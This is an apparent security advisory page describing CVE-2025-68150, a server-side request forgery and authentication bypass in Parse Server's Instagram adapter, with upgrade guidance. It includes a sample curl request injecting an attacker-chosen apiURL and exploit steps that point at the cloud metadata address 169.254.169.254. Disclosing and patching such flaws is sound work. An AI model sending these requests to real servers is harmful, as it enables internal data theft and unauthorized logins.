Parse Server, Server-Side Request Forgery (SSRF), CVE-2025-68150 (High)

By /

Listen to this Post

The vulnerability exists in the Instagram authentication adapter of Parse Server. During the OAuth flow, the adapter improperly accepted a client-controlled `apiURL` parameter within the `authData` object. This allowed attackers to specify an arbitrary URL to which the Parse Server would send the Instagram token verification request. By pointing this `apiURL` to a malicious server under their control, an attacker could perform Server-Side Request Forgery (SSRF), forcing the vulnerable server to make HTTP requests to internal or external systems. Furthermore, if the attacker’s malicious endpoint returned a crafted fake response mimicking a valid Instagram API reply, the Parse Server could be tricked into authenticating an unauthorized user. The flaw was rooted in the lack of validation or restriction on the destination of the outgoing authentication request.

dailycve form:

Platform: Parse Server
Version: < 8.6.2
Vulnerability : Server-Side Request Forgery
Severity: High
date: 2025-12-16

Prediction: 2025-12-16

What Undercode Say:

Check current Parse Server version
npm list parse-server
Test for vulnerability (Conceptual)
curl -X POST 'https://target.parse-server.com/parse/users' \
-H "X-Parse-Application-Id: APP_ID" \
-d '{
"authData": {
"instagram": {
"id": "USER_ID",
"access_token": "ACCESS_TOKEN",
"apiURL": "http://malicious.internal/"
}
}
}'

How Exploit:

  1. Attacker intercepts or constructs Instagram OAuth request to Parse Server.
  2. Attacker injects a malicious `apiURL` parameter (e.g., pointing to internal AWS metadata service `http://169.254.169.254/` or a controlled server) into the `authData` object.
  3. Parse Server sends the token verification request to the attacker-specified URL.
  4. For SSRF: The server accesses internal resources, returning data to the attacker.
  5. For auth bypass: Attacker’s server responds with a fake, valid user payload, tricking Parse Server into granting access.

    Protection from this CVE

– Update to Parse Server version 8.6.2 or 9.1.1-alpha.1 (and above).
– The patch hardcodes the API URL to `https://graph.instagram.com` and ignores client-supplied `apiURL` values.
– No known workarounds exist; upgrading is essential.

Impact

  • SSRF Attacks: Unauthorized access to internal networked services and sensitive data.
  • Authentication Bypass: Potential for unauthorized application login.
  • Remote Exploitation: Attack is network-exploitable without user interaction.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top